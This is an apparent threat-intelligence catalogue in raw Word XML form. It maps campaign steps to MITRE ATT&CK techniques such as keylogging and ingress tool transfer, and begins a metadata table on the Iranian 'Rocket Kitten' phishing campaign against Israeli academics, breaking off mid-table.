          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Credentials from Password Stores&gt;:Credentials from Web Browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A58B0F" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D4809C"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E56C96C"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427A0B87"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1056.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1904F8" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE09082"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1105']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B14B315" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3426D6AA" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00005982"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65984C38" w14:textId="51060DC6" w:rsidR="00005982" w:rsidRPr="005935F8" w:rsidRDefault="00005982" w:rsidP="00005982">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00005982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C35E04" w14:textId="79583989" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="00657397">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc153480838"/>
      <w:r>
        <w:t>T1566.00</w:t>
      </w:r>
      <w:r w:rsidR="00C46001">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00657397">
        <w:t>ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidRPr="005B4630">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FA7E8A" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="00005982">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005982" w:rsidRPr="002D1D50" w14:paraId="72419477" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61D57216" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="002D1D50" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="25" w:name="OLE_LINK21"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5486A842" w14:textId="669CCC58" w:rsidR="00005982" w:rsidRPr="002D1D50" w:rsidRDefault="00791811" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CF1C5E4" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00387DCC" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00005982" w:rsidRPr="00B857D7" w14:paraId="5076AA2E" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58E994DC" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1400B10A" w14:textId="0488C222" w:rsidR="00005982" w:rsidRDefault="00657D78" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Ajax Security Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79947C6F" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00387DCC" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00005982" w:rsidRPr="00B857D7" w14:paraId="50ACA0CA" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="736B8A4A" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="007328DE" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FA52214" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="007328DE" w:rsidRDefault="00005982" w:rsidP="002E403F">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7D195A5D" w14:textId="333E8CD5" w:rsidR="00005982" w:rsidRPr="00387DCC" w:rsidRDefault="00D86C07" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">The Thamar </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Gindin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> case: Thamar Reservoir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00005982" w:rsidRPr="00B857D7" w14:paraId="01D0338D" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09A13ABB" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0956C724" w14:textId="2EF0292E" w:rsidR="00005982" w:rsidRPr="007328DE" w:rsidRDefault="00657D78" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Iran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61227430" w14:textId="7C1465C1" w:rsidR="00005982" w:rsidRPr="00387DCC" w:rsidRDefault="00CD17CA" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">The Thamar </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Gindin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> case: Thamar Reservoir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00005982" w:rsidRPr="00B857D7" w14:paraId="0FF2E4FF" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B566118" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BD7AA64" w14:textId="16FD9BEA" w:rsidR="00005982" w:rsidRDefault="00DE6522" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Israel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BB0928D" w14:textId="35908770" w:rsidR="00005982" w:rsidRPr="00387DCC" w:rsidRDefault="00CD17CA" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">The Thamar </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Gindin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0069253B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> case: Thamar Reservoir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00005982" w:rsidRPr="00B857D7" w14:paraId="01DFAEC8" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7447BFD5" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F974D3B" w14:textId="0AE19E5F" w:rsidR="00005982" w:rsidRDefault="00CD17CA" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Academic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A7ABE34" w14:textId="77777777" w:rsidR="00005982" w:rsidRPr="00387DCC" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00005982" w:rsidRPr="00B857D7" w14:paraId="4BDFD497" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D40D29E" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ADCFECC" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B27AB34" w14:textId="50663CE9" w:rsidR="00005982" w:rsidRDefault="00E0545E" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Espionage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00005982" w:rsidRPr="00B857D7" w14:paraId="4A00A164" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64EB7181" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="376E5B19" w14:textId="3084DE54" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FA9A3E1" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00005982" w:rsidRPr="00B857D7" w14:paraId="0D939D8B" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="153C4B14" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4518F843" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69F8EC71" w14:textId="77777777" w:rsidR="00005982" w:rsidRDefault="00005982" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947A0B" w:rsidRPr="00B857D7" w14:paraId="1E8014D7" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="342F5E1E" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="183A6C88" w14:textId="64443850" w:rsidR="00947A0B" w:rsidRDefault="00CD17CA" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="146269C3"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3001932C" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32AC3C05" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14876356" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
